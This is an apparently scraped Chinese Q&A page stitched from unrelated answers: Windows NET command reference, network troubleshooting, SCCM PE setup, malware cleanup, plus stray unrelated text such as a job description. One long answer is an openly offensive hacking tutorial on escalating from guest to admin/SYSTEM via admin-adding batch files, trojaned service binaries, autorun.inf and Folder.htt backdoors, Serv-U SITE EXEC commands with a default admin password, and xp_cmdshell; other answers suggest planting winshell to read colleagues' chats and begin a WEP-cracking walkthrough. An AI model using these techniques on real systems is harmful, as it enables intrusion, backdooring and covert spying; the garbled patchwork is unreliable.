1. 在windows中用shell遍历一个文件夹下得所有文件并对文件执行同一个指令
你的for循环中循环的是$PATH ,他只是代表这个路径,并不表示里面的文件名。
2. 常用的几条NET命令高手给介绍几条
以下有很多,常用的有net use,net user,net time,net stop/start 等
3)NET USE
作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。
命令格式:net use [devicename | *] [\\computername\sharename[\volume> [password | *> [/user:[domainname\]username]
参数介绍:
键入不带参数的net use列出网络连接。
devicename指定要连接到的资源名称或要断开的设备名称。 \\computername\sharename服务器及共享资源的名称。
password访问共享资源的密码。
*提示键入密码。 /user指定进行连接的另外一个用户。
domainname指定另一个域。
username指定登录的用户名。
/home将用户连接到其宿主目录
/delete取消指定网络连接。
/persistent控制永久网络连接的使用。
简单事例:
<1>net use e: \\YFANG\TEMP将\\YFANG\TEMP目录建立为E盘
<2>net use e: \\YFANG\TEMP /delete断开连接
(4)NET TIME
作 用:使计算机的时钟与另一台计算机或域的时间同步。
命令格式:net time [\\computername | /domain[:name> [/set]
参数介绍:
<1>\\computername要检查或同步的服务器名。
<2>/domain[:name]指定要与其时间同步的域。
<3>/set使本计算机时钟与指定计算机或域的时钟同步。
下面的这4个参数是相关的,所以一起介绍
(5)Net Start
作 用:启动服务,或显示已启动服务的列表。
命令格式:net start service
(6)Net Pause
作 用:暂停正在运行的服务。
命令格式:net pause service
(7)Net Continue
作 用:重新激活挂起的服务。
命令格式:net continue service
(8)NET STOP
作 用:停止 Windows NT 网络服务。
命令格式:net stop service
参数介绍:我们来看看这些服务都是什么
<1>alerter(警报)
<2>client service for netware(Netware 客户端服务)
<3>clipbook server(剪贴簿服务器)
<4>computer browser(计算机浏览器)
<5>directory replicator(目录复制器)
<6>ftp publishing service (ftp )(ftp 发行服务)
<7>lpdsvc
<8>net logon(网络登录) <9>network dde网络 dde)
<10>network dde dsdm(网络 dde dsdm)
<11>network monitor agent(网络监控代理)
<12>nt lm security support provider(NT LM 安全性支持提供)
<13>ole(对象链接与嵌入)
<14>remote access connection manager(远程访问连接管理器)
<15>remote access isnsap service(远程访问 isnsap 服务)
<16>remote access server(远程访问服务器)
<17>remote procere call (rpc) locator(远程过程调用定位器)
<18>remote procere call (rpc) service(远程过程调用服务)
<19>schele(调度)
<20>server(服务器)
<21>simple tcp/ip services(简单 TCP/IP 服务)
<22>snmp
<23>spooler(后台打印程序)
<24>tcp/ip netbios helper(TCP/IP NETBIOS 辅助工具)
<25>ups (26)workstation(工作站)
<27>messenger(信使)
<28>dhcp client
<29>eventlog 以下这些SERVICE只能在NT SERVER上使用
<< 1>>)file server for macintosh
<<2>>gateway service for netware
<<3>>microsoft dhcp server
<<4>>print server for macintosh
<<5>>remoteboot
<<6>>windows internet name service
(9)Net Statistics
作 用:显示本地工作站或服务器服务的统计记录。
命令格式:net statistics [workstation | server]
参数介绍:
<1>键入不带参数的net statistics列出其统计信息可用的运行服务。 <2>workstation显示本地工作站服务的统计信息。
<3>server显示本地服务器服务的统计信息。
简单事例:
<1>net statistics server | more显示服务器服务的统计信息
(10)Net Share
作 用:创建、删除或显示共享资源。
命令格式:net share sharename=drive:path [/users:number | /unlimited] [/remark:"text"]
参数介绍:
<1>键入不带参数的net share显示本地计算机上所有共享资源的信息。
<2>sharename是共享资源的网络名称。
<3>drive:path指定共享目录的绝对路径。
<4>/users:number设置可同时访问共享资源的最大用户数。
<5>/unlimited不限制同时访问共享资源的用户数。
<6>/remark:"text "添加关于资源的注释,注释文字用引号引住。
简单事例:
<1>net share mylove=c:\temp /remark:"my first share"以mylove为共享名共享C:\temp
<2>net share mylove /delete停止共享mylove目录
(11)Net Session
作 用:列出或断开本地计算机和与之连接的客户端的会话,也可以写为net sessions或net sess。
命令格式:net session [\\computername] [/delete]
参数介绍:
<1>键入不带参数的net session显示所有与本地计算机的会话的信息。
<2>\\computername标识要列出或断开会话的计算机。
<3>/delete结束与\\computername计算机会话并关闭本次会话期间计算机的所有?
简单事例:
<1>net session \\YFANG要显示计算机名为YFANG的客户端会话信息列表。
(12)Net Send
作 用:向网络的其他用户、计算机或通信名发送消息。
命令格式:net send {name | * | /domain[:name] | /users} message 参数介绍:
<1>name要接收发送消息的用户名、计算机名或通信名。
<2>*将消息发送到组中所有名称。
<3>/domain[:name]将消息发送到计算机域中的所有名称。
<4>/users将消息发送到与服务器连接的所有用户。
<5>message作为消息发送的文本。
简单事例:
<1>net send /users server will shutdown in 5 minutes. 给所有连接到服务器的用户发送消息
(13)Net Print
作 用:显示或控制打印作业及打印队列。
命令格式:net print [\\computername ] job# [/hold | /release | /delete]
参数介绍:
<1>computername共享打印机队列的计算机名。
<2>sharename打印队列名称。
<3>job#在打印机队列中分配给打印作业的标识号。
<4>/hold使用 job# 时,在打印机队列中使打印作业等待。
<5>/release释放保留的打印作业。
<6>/delete从打印机队列中删除打印作业。
简单事例:
<1>net print \\YFANG\SEEME列出\\YFANG计算机上SEEME打印机队列的目录
(14)Net Name
作 用:添加或删除消息名(有时也称别名),或显示计算机接收消息的名称列表。
命令格式:net name [name [/add | /delete>
参数介绍:
<1>键入不带参数的net name列出当前使用的名称。
<2>name指定接收消息的名称。
<3>/add将名称添加到计算机中。
<4>/delete从计算机中删除名称。
(15)Net Localgroup
作 用:添加、显示或更改本地组。
命令格式:net localgroup groupname {/add [/comment:"text "] | /delete} [/domain]
参数介绍:
<1>键入不带参数的net localgroup显示服务器名称和计算机的本地组名称。
<2>groupname要添加、扩充或删除的本地组名称。
<3>/comment: "text "为新建或现有组添加注释。
<4>/domain在当前域的主域控制器中执行操作,否则仅在本地计算机上执行操作?
<5>name [ ...]列出要添加到本地组或从本地组中删除的一个或多个用户名或组名。
<6>/add将全局组名或用户名添加到本地组中。
<7>/delete从本地组中删除组名或用户名。
简单事例:
<1>net localgroup love /add将名为love的本地组添加到本地用户帐号数据库
<2>net localgroup love显示love本地组中的用户
(16)Net Group
作 用:在 Windows NT Server 域中添加、显示或更改全局组。
命令格式:net group groupname {/add [/comment:"text "] | /delete} [/domain]
参数介绍:
<1>键入不带参数的net group显示服务器名称及服务器的组名称。
<2>groupname要添加、扩展或删除的组。
<3>/comment:"text "为新建组或现有组添加注释。 <4>/domain在当前域的主域控制器中执行该操作,否则在本地计算机上执行操作?
<5>username[ ...]列表显示要添加到组或从组中删除的一个或多个用户。
<6>/add添加组或在组中添加用户名。
<7>/delete删除组或从组中删除用户名。
简单事例:
<1>net group love yfang1 yfang2 /add将现有用户帐号yfang1和yfang2添加到本地计算机的love组
(17)Net File
作 用:显示某服务器上所有打开的共享文件名及锁定文件数。
命令格式:net file [id [/close>
参数介绍:
<1>键入不带参数的net file获得服务器上打开文件的列表。
<2>id文件标识号。
<3>/close关闭打开的文件并释放锁定记录。
(18)Net Config
作 用:显示当前运行的可配置服务,或显示并更改某项服务的设置。
命令格式:net config [service [options>
参数介绍:
<1>键入不带参数的net config显示可配置服务的列表。
<2>service通过net config命令进行配置的服务(server或workstation)
<3>options服务的特定选项。
(19)Net Computer
作 用:从域数据库中添加或删除计算机。
命令格式:net computer \\computername {/add | /del}
参数介绍:
<1>\\computername指定要添加到域或从域中删除的计算机。
<2>/add将指定计算机添加到域。
<3>/del将指定计算机从域中删除。
简单事例:
<1>net computer \\cc /add将计算机 cc 添加到登录域
(20)Net Accounts
作 用:更新用户帐号数据库、更改密码及所有帐号的登录要求。
命令格式:net accounts [/forcelogoff:{minutes | no}] [/minpwlen:length] [/maxpwage:{days | unlimited}] [/minpwage:days] [/uniquepw:number] [/domain]
参数介绍:
<1>键入不带参数的net accounts显示当前密码设置、登录时限及域信息。
<2>/forcelogoff:{minutes | no}设置当用户帐号或有效登录时间过期时
<3>/minpwlen:length设置用户帐号密码的最少字符数。
<4>/maxpwage:{days | unlimited}设置用户帐号密码有效的最大天数。
<5>/minpwage:days设置用户必须保持原密码的最小天数。
<6>/uniquepw:number要求用户更改密码时,必须在经过number次后才能重复使用 与之相同的密码。
<7>/domain在当前域的主域控制器上执行该操作。 <8>/sync当用于主域控制器时,该命令使域中所有备份域控制器同步
简单事例:
<1>net accounts /minpwlen:7
将用户帐号密码的最少字符数设置为7
----------------------上面介绍的是NET命令在WINNT下的基本用法
----------------------下面我们看看NET命令在WIN98下的基本用法
在WIN98中NET命令也有一些参数 其中有一些参数的名字和功能及简单的使用方法和WINNT下的相应的参数的用法相同
其中有
(1)NET TIME命令
(2)NET PRINT命令
(3)NET USE命令
(4)NET VIEW命令
在WIN98中NET命令有一些参数 其中有一些参数的名字和WINNT下的相应的参数的名字相同但其用法却有些不同
其中有
(1)NET START
作 用:启动相应的服务。(不能在DOS-WIN中用)
命令格式:NET START [BASIC | NWREDIR | WORKSTATION | NETBIND | NETBEUI | NWLINK] [/LIST] [/YES] [/VERBOSE]
(2)NET STOP
作 用:停止相应的服务.(不能在DOS-WIN中用)
命令格式:NET STOP [BASIC | NWREDIR | WORKSTATION | NETBEUI | NWLINK] [/YES]
在WIN98中NET命令还有一些参数是在98下才有的
其中有
(1)NET DIAG
作 用:运行MS的DIAGNOSTICS程序显示网络的DIAGNOSTIC信息
命令格式:NET DIAGNOSTICS [/NAMES | /STATUS]
(2)NET INIT
作 用:不通过绑定来加载协议或网卡驱动(不能在DOS-WIN中用)
命令格式:NET INITIALIZE [/DYNAMIC]
(3)NET LOGOFF
作 用:断开连接的共享资源(不能在DOS-WIN中用)
(4)NET LOGON
作 用:在WORKGROUP中登陆(不能在DOS-WIN中用)
命令格式:NET LOGON [user [password | ?> [/DOMAIN:name] [/YES] [/SAVEPW:NO]
(5)NET PASSWORD
作 用:更改你的网络登陆口令(不能在DOS-WIN中用)
命令格式:NET PASSWORD \\computer | /DOMAIN:name [user [oldpassword [newpassword>]
回答者:fuping111 - 首席运营官 十二级 3-21 09:56
提问者对于答案的评价:
谢谢
评价已经被关闭 目前有 0 个人评价
好
50% (0) 不好
50% (0)
其他回答共 1 条
NET HELP
command
-或-
NET command /HELP
Commands available are:
NET ACCOUNTS NET HELP NET SHARE
NET COMPUTER NET HELPMSG NET START
NET CONFIG NET LOCALGROUP NET STATISTICS
NET CONFIG SERVER NET NAME NET STOP
NET CONFIG WORKSTATION NET PAUSE NET TIME
NET CONTINUE NET PRINT NET USE
NET FILE NET SEND NET USER
NET GROUP NET SESSION NET VIEW
NET HELP SERVICES 列出你可以启动的网路服务。
NET HELP SYNTAX 解释如何读取 NET HELP 语法行。
NET HELP command | MORE 会以一次一个萤幕的方式显示说明
3. 破解GUEST权限
呵呵,给你这点东西,很有用的。
GUEST帐号默认是没有权限创建一个管理员帐号的。可是偏偏就有这么一个方法让其当了回“老大”,简单几步就夺下了系统的最高权限。这其中的大概原理也很简单,由于Windows XP在登录前会自动完成一系列脚本的运行,我们可在GUEST帐户下利用组策略来创建一个新建管理员帐号的脚本,使系统优先执行它即可。
步骤1:打开记事本,在其中输入如下命令:
net user netfriends 123456 /add
net localgroup administrators netfriends /add
命令解释:这里的netfriends是我们要创建的系统管理员帐户名,123456为其密码,将其保存为批处理文件,比如“netfriends.bat”。
如果你不想这样做的话,还有这个呢。
Guest权限提升方法总结:
现在的入侵是越来越难了,人们的安全意识都普遍提高了不少,连个人用户都懂得防火墙,杀毒软件要装备在手,对于微软的补丁升级也不再是不加问津。因此现在我们想在因特网上扫描弱口令的主机已经几乎是痴心妄想了。(这可是一件大大的好事啊。)
但是这也使得我们作黑客的进行入侵检测达到了一个前所未有的难度。通过各种手段,我们通常并不能直接获得一个系统的管理员权限。比如我们通过某些对IIS的攻击,只能获得IUSR-MACHINENAME的权限(如上传asp木马,以及某些溢出等)。这个帐号通常可是系统默认的guest权限,于是,如何拿到系统管理员或者是system权限,便显得日益重要了。
于是,我就总结了一下大家所经常使用的几种提升权限的方法,以下内容是我整理的,没有什么新的方法,写给和我一样的菜鸟看的。高手们就可以略去了,当然,你要复习我不反对,顺便帮我查查有什么补充与修改:
1、社会工程学。
对于社会工程学,我想大家一定不会陌生吧?(如果你还不太明白这个名词的话,建议你去找一些相关资料查查看。)我们通常是通过各种办法获得目标的敏感信息,然后加以分析,从而可以推断出对方admin的密码。举一个例子:假如我们是通过对服务器进行数据库猜解从而得到admin在网站上的密码,然后借此上传了一个海洋顶端木马,你会怎么做?先翻箱倒柜察看asp文件的代码以希望察看到连接SQL的帐号密码?错错错,我们应该先键入一个netstat –an命令察看他开的端口(当然用net start命令察看服务也行)。一旦发现他开了3389,犹豫什么?马上拿出你的终端连接器,添上对方IP,键入你在他网站上所获得的用户名及密码……几秒之后,呵呵,进去了吧?这是因为根据社会工程学的原理,通常人们为了记忆方便,将自己在多处的用户名与密码都是用同样的。于是,我们获得了他在网站上的管理员密码,也就等同于获得了他所有的密码。其中就包括系统admin密码。于是我们就可以借此登入他的3389拉!
即使他并没有开启3389服务,我们也可以凭借这个密码到他的FTP服务器上试试,如果他的FTP服务器是serv-u 5.004 以下版本,而帐号又具有写权限,那么我们就可以进行溢出攻击了!这可是可以直接拿到system权限的哦!(利用serv-u还有两个提升权限的方法,
我待会儿会说的)
实在不行,我们也可以拿它的帐号去各大网站试试!或许就能进入他所申请的邮箱拿到不少有用的信息!可以用来配合我们以后的行动。
还有一种思路,我们知道,一个网站的网管通常会将自己的主页设为IE打开后的默认主页,以便于管理。我们就可以利用这一点,将他自己的主页植上网页木马……然后等他打开IE……呵呵,他怎么也不会想到自己的主页会给自己种上木马吧?
其实利用社会工程学有很多种方法,想作为一个合格黑客,这可是必学的哦!多动动你自己的脑子,你才会成功!
2、本地溢出。
微软实在是太可爱了,这句话也不知是哪位仁兄说的,真是不假,时不时地就会给我们送来一些溢出漏洞,相信通过最近的MS-0011大家一定又赚了一把肉鸡吧?其实我们在拿到了Guest权限的shell后同样可以用溢出提升权限。最常用的就是RunAs.exe、 winwmiex.exe 或是PipeUpAdmin等等。上传执行后就可以得到Admin权限。但一定是对方没有打过补丁的情况下才行,不过最近微软的漏洞一个接一个,本地提升权限的exploit也会出来的,所以大家要多多关心漏洞信息,或许下一个exploit就是你写出来的哦!
3、利用scripts目录的可执行权限。
这也是我们以前得到webshell后经常使用的一招,原理是Scripts目录是IIS下的可运行目录,权限就是我们梦寐以求的SYSTEM权限。常见的使用方法就是在U漏洞时代我们先上传idq.dll到IIS主目录下的Scripts目录,然后用ispc.exe进行连接,就可以拿到system权限,不过这个是在Microsoft出了SP3之后就行不通了,其实我们仍可以利用此目录,只要我们上传别的木马到此目录,我举个例子就比如是winshell好了。然后我们在IE中输入:
http://targetIP/Scripts/木马文件名.exe
等一会,看到下面进度条显示“完成”时,可以了,连接你设定的端口吧!我这里是默认的5277,连接好后就是SYSTEM权限了!这时你要干什么我就管不着了……嘿嘿
4、替换系统服务。
这可是广大黑友乐此不疲的一招。因为windows允许对正在运行中的程序进行改动,所以我们就可以替换他的服务以使得系统在重启后自动运行我们的后门或是木马!首先,通过你获得的guest权限的shell输入:net start命令,察看他所运行的服务。此时如果你对windows的系统服务熟悉的话,可以很快看出哪些服务我们可以利用。
C:WINNTSystem32>net start
已经启动以下 Windows 服务:
COM+ Event System
Cryptographic Services
DHCP Client
Distributed Link Tracking Client
DNS Client
Event Log
Help and Support
IPSEC Services
Logical Disk Manager
Logical Disk Manager Administrative Servic
Network Connections
Network Location Awareness (NLA)
Protected Storage
Remote Procere Call (RPC)
Rising Process Communication Center
Rising Realtime Monitor Service
Secondary Logon
Security Accounts Manager
Shell Hardware Detection
System Event Notification
System Restore Service
Telephony
Themes
Upload Manager
WebClient
Windows Audio
Windows Image Acquisition (WIA)
Windows Management Instrumentation
Windows Time
Wireless Zero Configuration
Workstation
命令成功完成。
CCenter.exe,而Rising Realtime Monitor Service服务调用的是RavMonD.exe。这些都是第三方服务,可以利用。(强烈推荐替换第三方服务,而不要乱动系统服务,否则会造成系统不稳定)于是我们搜索这两个文件,发现他们在D: risingrav文件夹中,此时注意一点:如果此文件是在系统盘的Program Files目录中时,我们要知道,如果对方是使用的NTFS格式的硬盘,那么系统盘下的这个文件夹guest权限是默认不可写的,还有Windows目录、Documents and Settings目录这些都是不可写的,所以我们就不能替换文件,只能令谋途径了。(这也是为什么我不建议替换系统服务的原因之一,因为系统服务文件都在WindowsSystem32目录中,不可写)但如果是FAT32格式就不用担心,由于它的先天不足,所有文件夹都是可写的。
于是就有人会问:如果是NTFS格式难道我们就没辙了吗?
当然不是,NTFS格式默认情况下除了对那三个文件夹有限制外,其余的文件夹、分区都是everyone完全控制。(也就是说我即使是IPC$的匿名连接,都会对这些地方有可写可运行权限!)所以一旦对方的第三方服务不是安装在那三个文件夹中,我们就可以替换了!我就拿CCenter下手,先将它下载到本地机器上(FTP、放到IIS主目录中再下载等等……)然后拿出你的文件捆绑机,找到一个你最拿手的后门……呵呵,捆绑好后,上传,先将对方的CCenter.exe文件改个名CCENTBAK.exe,然后替换成自己的CCenter。现在只需要等对方的机器重启,我们的后门就可以运行了!由于Windows系统的不稳定,主机在一个礼拜后就会重启,(当然如果你等不及的话,可以对此服务器进行DDOS攻击迫使他重启,但我并不赞同!)此时登上你的后门,就是System权限了!
5、替换admin常用程序。
如果对方没有你所能利用的服务,也可以替换对方管理员常用的程序,例如QQ,MSN等等,具体替换方法与替换服务一样,只是你的后门什么时候可以启动就得看你的运气了。
6、利用autorun .inf或desktop.ini。
我们常会碰到这种事:光盘放进光驱,就会自动跳出来一段FLASH,这是为什么?呵呵,你到光盘的根目录中看看,是否有一个autorun.inf的文件?用记事本打开来看看,是不是有这么一句话:autorun=xxx.exe 这就是你刚才所看到的自动运行的程序了。
于是我们就可以利用这个来提升我们的权限。先配置好一个后门,(我常用的是winshell,当然你不用这个也行)上传到他D盘下的任意一个文件夹中,然后从你那个自运行的光盘中把autorun.inf文件也上传,不过上传前先将autorun=xxx.exe 后面的xxx.exe改为你配置的后门文件途径、文件名,然后再上传到d盘根目录下,加上只读、系统、隐藏属性。OK就等对方admin浏览D盘,我们的后门就可以启动了!(当然,这必须是在他没有禁止自动运行的情况下才行。)
另外有相同作用的是desktop.ini。大家都知道windows支持自定义文件,其实它就是通过在文件夹中写入特定文件——desktop.ini与Folder.htt来实现的,我们就可以利用修改这文件来达到我们的目的。
首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择“自定义文件夹”(xp好像是不行的)一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Folder setting的文件架与desktop.ini的文件,(如果你看不到,先取消“隐藏受保护的操作系统文件”)然后我们在Folder setting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码:
<OBJECT ID=”RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=”你的后门文件名”>
</OBJECT>
然后你将你的后门文件放在Folder setting目录下,把此目录与desktop.ini一起上传到对方任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的后门!(如果你不放心,可以多设置几个目录)
7、Serv-U提升权限
利用Serv-U提升权限共有三种方法,溢出是第一种,我之前已经说过,这里就不介绍了。我要讲的是其余两种办法。
办法一:要求:对Serv-u安装目录有完全控制权。
方法:进入对方的Serv-U目录,察看他的ServUDaemon.ini,这是Serv-U的配置文件,如果管理员没有选择将serv- u的所有配置写入注册表的话,我们就可以从这个文件中看到Serv-U的所有信息,版本、IP、甚至用户名与密码!早些版本的密码是不加密的,但是后来是经过了MD5加密。所以不能直接得到其密码。不过我们仍然有办法:先在本地安装一个Serv-U(版本最好新点),将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini 覆盖掉,重起一下Serv-U,于是你上面的所有配置都与他的一模一样了。我们新建一个用户,什么组不重要,重要的是将他的主目录改为对方的系统盘,然后加上执行权限!这个最重要。更改完后应用,退出。再将你更改过的ServUDaemon.ini 文件上传,覆盖掉他的文件,然后就等他的Serv-U重启更新配置,之后我们就可以登入他的FTP。进入后执行以下命令:
Cd windows
Cd System32
Quote site exec net.exe user wofeiwo /add
Quote site exec net.exe localgroup administrators wofeiwo /add
Bye
然后你就有了一个叫wofeiwo的系统管理员了,还等什么?登陆3389,大功告成!
办法二:Serv-u开了两个端口,一个是21,也就是FTP了,而另一个是43958,这个端口是干什么的?嘿嘿,这个是Serv-U的本地管理端口。但是默认是不准除了127.0.0.1外的ip连接的,此时就要用到FPIPE.exe文件,这是一个端口转发程序,上传他,执行命令:
Fpipe –v –l 3333 –r 43958 127.0.0.1
意思是将4444端口映射到43958端口上。
然后就可以在本地安装一个Serv-u,新建一个服务器,IP填对方IP,帐号为LocalAdministrator 密码为#1@$ak#.1k;0@p 连接上后你就可以管理他的Serv-u了,之后提升权限的方法参考办法一。我就不赘述了。
8、SQL帐户密码泄露。
如果对方开了MSSQL服务器,我们就可以通过用SQL连接器加管理员帐号,因为MSSQL是默认的SYSTEM权限。
要求:你得到了对方MSSQL管理员密码(可以从他的连接数据库的ASP文件中看到),对方没有删除xp_cmdshell
方法:使用Sqlexec.exe,在host 一栏中填入对方IP,User与Pass中填入你所得到的用户名与密码。Format选择xp_cmdshell”%s”即可。然后点击connect,连接上后就可以在CMD一栏中输入你想要的CMD命令了。
唔……升个懒腰,好累阿,终于写完8个方法了,发发牢骚……(以下省略N字符)
总之,以上的8种方法并不是绝对的,最主要的是你的思路,每种方法互相结合,才能发挥其应有的效应。
4. 排除一些网络故障的常用命令
常用命令集锦
一、 ping
网管使用最频的当是ping命令,它不仅可以检查网络是否连通,还有益于分析判断网络故障。其常用方法有:
1. ping本机IP
本机始终都是应该对该ping命令作出应答,如没有,则表示本地配置或安装存在问题。出现此问题时,局域网用户可断开网缆,然后重新发送该命令:如果网线断开后本命令正确,则表示另一机子可能配置了相同的IP地址。这里显示的TTL(Time To Live存在时间),表示数据包已通过的路由器数量。
2. ping网关IP
命令应答如果正确,表示局域网中的网关路由器正在正常运行
3. ping远程IP
如果收到4个应答,表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet(但不排除ISP的DNS会有问题)。
4. ping局域网内其他IP
该命令将会经过网卡及网缆到达其他机器后再返回。收到回送应答表明本地网络中的网卡和载体运行正确;但若收到0个回送应答,那么表示子网掩码(进行子网分割时,将IP地址的网络部分与主机部分分开的代码)不正确或网卡配置错误或电缆系统有问题。
5. ping localhost
localhost是系统的网络保留名,它是127.0.0.1的别名,每台机器都能将该名字转换成该地址。
6. ping www.xxx.com(如www.sina.com)
对这个域名执行Ping www.xxx..com地址,通常是通过DNS服务器。如果出现故障,则表示DNS服务器的IP地址配置不正确或DNS服务器有故障。
简言之,如果ping运行正确,我们大体上就可以排除网络访问层、网卡、Modem的输入输出线路、电缆和路由器等存在的故障,从而减小了问题的范围。但由于可以自定义所发数据报的大小及无休止的告诉发送,ping也被某些别有用心的人作为DDOS(拒绝服务攻击)的工具,例如许多大型的网站就是被黑客利用数百台可以告诉介入互联网的电脑连续发送大量ping数据报而瘫痪的。
二、 Netstat
Netstat用于显示与IP、TCP、UDP和ICMP协议相关的统计数据,一般用于检验本机各端口的网络连接情况。
1. netstat-s
本命令能按照各协议分别显示其统计数据。如果我们的应用程序或浏览器运行速度较慢,或者不能显示Web页之类的数据,那么我们就可以用本选项来查看所显示的信息。
2. netstat-e
用于显示以太网统计数据。它列出了发送和接收端的数据报数量,包括传送的数据报的总字节数、错误数、删除数、数据报的数量和广播的数量,可用来统计基本的网流量。
3. netstat-r
可显示路由表信息
4. netstat-a
显示所有有效连接信息列表,包括已建立连接(ESTABLISHED)与监听连接请求(LISTENING)的连接。
三、 IPConfig
IPConfig用于显示当前TCP/IP配置。如果我们的机子和所在局域网使用了动态主机配置协议(DHCP),这时IPConfig可以让我们了解自己的计算机是否成功的租用到一个IP地址,如果租用到则可以了解它目前分配到的是什么地址。了解机器当前IP地址、子网掩码和缺省网关实际上有利于测试和分析故障。
1. ipconfig
它显示每个已经配置的接口的IP地址、子网掩码和缺省网关值。
2. ipconfig/all
当使用all选项时,IPConfig能为DNS和WINS服务器显示它已经配置且所要使用的附加信息(如IP地址等),并且显示内置于本地网卡中的物理地址(MAC)。
四、 ARP
ARP(地址转换协议)是一个重要的TCP/IP协议,用于确定对应IP地址的网卡物理地址。ARP命令能够查看本地或另一台计算机的ARP高速缓存中的当前内容。
1. arp-a或arp-g
用于查看高速缓存中的所有项目。
2. arp-a IP
如果我们有多个网卡,那么使用arp-a加上接口的IP地址,就可以只显示与该接口相关的ARP缓存项目。
五、 Tracert
如果网络连通有问题,可用tracert检查到达的目标IP地址的路径并记录结果。Tracert的使用很简单,只需要再Tracert后面跟一个IP地址或URL,Tracert一般用来检测故障的位置,我们可以用“tracert IP”确定在哪个环节上出了问题。
六、 Route
大多数主机一般都是驻留在只连接一台路由器的网段上。由于只有一台路由器,一次不存在使用哪一台路由器将数据报发表到远程计算机的问题,该路由器的IP地址可作为该网段上所有计算机的缺省网关输入。
但是,当网络上拥有两个或多个路由器时,我们就不一定想只依赖缺省网关了。实际上我们可能想让我们的某些远程IP地址通过某个特定的路由器来传递,而其他的远程IP则通过另一个路由器来传递。Route print命令用于显示路由表中的当前项目,在单路由器网段上的输出。
七、 NBTStat
本命令可释放和刷新NetBIOS名称。运用NetBIOS,我们可以查看本地计算机或远程计算机上的NetBIOS名字表格。
1. nbtstat-n
显示寄存在本地的名字和服务程序。
2. nbtstat-c
用于显示NetBIOS名字高速缓存的内容。NetBIOS名字高速缓存用于存放与本计算机最近进行通信的其他计算机的NetBIOS名字和IP地址对。
3. nbtstat-r
用于清除和重新加载NetBIOS名字高速缓存。
4. nbtstat-a IP
通过IP显示另一台计算机的物理地址和名字列表,我们所显示的内容就像对方计算机自己运行nbtstat-n一样。
5. nbtstat-s IP
显示使用其IP地址的另一台计算机的NetBIOS连接表。
八、 设置共享的命令
1. net share
查看机器的共享资源。
2. 手工删除共享
Net share c$ /d
Net share d$ /d
Net share ipc$ /d
Net share admin$ /d
3.增加一个共享
C:net share mymovie=e:downloadsmovie/users:l
增加mymovie共享,同时限制链接用户数为1人。
5. PE添加winshell
先把修改好的WinXShell(下载地址在最下面) 放到共享文件夹,有32位和64位,
然后再到SCCM控制去更新32位和64位启动映像包,选择对应的共享文件夹路径更新完成即可。
再SCCM 任务序列当中 加一个运行命令行步骤 分别在32位启动映像包和64位启动映像包 输入 cmd /c start x:smspkgsms10000WinXShell_x86WinXShell.exe -winpe 、 cmd /c start x:smspkgsms10000WinXShell_x64WinXShell.exe -winpe ,上面启动映像包添加的工具都在此路径 x:smspkgsms10000 目录当中,接下来就可以去看下OSD任务序列进入PE图形显示效果了,虽然功能还是很简陋。
一、合格的工艺工程师必须非常熟悉产品的设计、制作工艺、包装、运输及产品的配套使用功能;在本行业属通才,了解所有工序工艺; 二、编制工艺流程,下生产指令单之前对产品制程工艺的核定; 三、规范与公司产品配套使用的采购产品工艺、使用功能要求,并签样板给供应商、品质部、采购部; 四、对新产品进行可生产性的评估,打样评估; 五、做好预先品管,提醒生产过程及检测时的品质注意事项。
6. 公司一个局域网内,怎么看其他电脑里的内容,比如smn聊天记录
安装个winshell,然后再把内容提取出来。
7. 求lisp大神修改一个按块分图命令,我的这个命令是把图纸内所有的块都分出去,帮我改成可以选择块进行分图
网上购买的虚拟主机上可以运行多个网站
但是其他的网站不能被重新绑定域名
但是您可以使用目录来实现
比如你原来的网站是AAA级。com
B就可以访问该目录通过AAA.COM / B放置新网站
8. svch0st.exe怎么清除
本文(解决方案)为剑盟反病毒成员(whzl123)原创作品,属剑盟中国成员原创文章(解决方案),转载请注明来源,本站保留追究法律责任的权利。
用费尔或XDE删除下列文件:
c:\documents and settings\all users\“开始”菜单\程序\启动\svch0st.exe
c:\documents and settings\a\“开始”菜单\程序\启动\svch0st.exe
c:\windows\system32\winmon.exe
c:\windows\371662m.exe
c:\windows\system32\taskmonitor.exe
c:\windows\system32\drivers\xpvidpf.sys
c:\windows\system32\dllcache\ravwin.exe
c:\SVCH0ST.EXE
d:\SVCH0ST.EXE
e:\SVCH0ST.EXE
f:\SVCH0ST.EXE
c:\autorun.inf
d:\autorun.inf
e:\autorun.inf
f:\autorun.inf
2.删除重启后使用SREng修复下面各项:
启动项目 -- 注册表之如下项删除:
[WinMon] <C:\WINDOWS\system32\WinMon.EXE>
[WinMon] <C:\WINDOWS\system32\WinMon.EXE>
[WinSysM] <; C:\WINDOWS\371662M.exe>
[WinMon] <C:\WINDOWS\system32\WinMon.EXE>
[Taskmonitor] <; C:\WINDOWS\system32\Taskmonitor.exe>
启动项目 -- 启动文件夹之如下项删除:
[SVCH0ST] <C:\Documents and Settings\All Users\“开始”菜单\程序\启动\SVCH0ST.EXE>
[SVCH0ST] <C:\Documents and Settings\a\“开始”菜单\程序\启动\SVCH0ST.EXE>
启动项目 -- 服务-- 驱动程序之如下项禁用:
[xpvidpf / xpvidpf] <system32\drivers\xpvidpf.sys>
映像挟持任务管理器???可能是改了注册表或有进程文件监控
SRE,usbcleaner,金山清理专家都有修复任务管理器的功能
9. 如何获取本机存储的无线网密码 如果回答的答案正确追加分数!!!
需要WinAircrackPack
该工具包是一个无线工具的组合包,包括WinAircrack.exe,wzcook.exe,airdecap.exe以及airomp.exe四个程序,这些程序各有各的用。
SSID号发现工具就是airomp.exe。对付 SSID影藏
第一步:解压缩下载的工具包,运行里头的airomp.exe
第二步:选择相应的网卡,输入对应无线网卡前的序号
第三步:输入o或者a选择网卡模式,
第四步:选择搜索频段,输入0是代表所有频段都检测的意思。
第五步:接下来会提示你输入一个保存文件,这样该工具会把所有sniffer下来的数据包放到这个文件中
第六步:only write wep ivs是否只检测WEP加密数据包,我们选择“Y”即可。
第七步:这时会出现一个提示,大概意思就是说目前驱动还不支持,无法进行sniffer的操作。同时浏览器会自动转到一个页面,我们可以通过这个页面下载兼容驱动程序,升级我们的无线网卡让sniffer工具——airomp.exe可以顺利运行
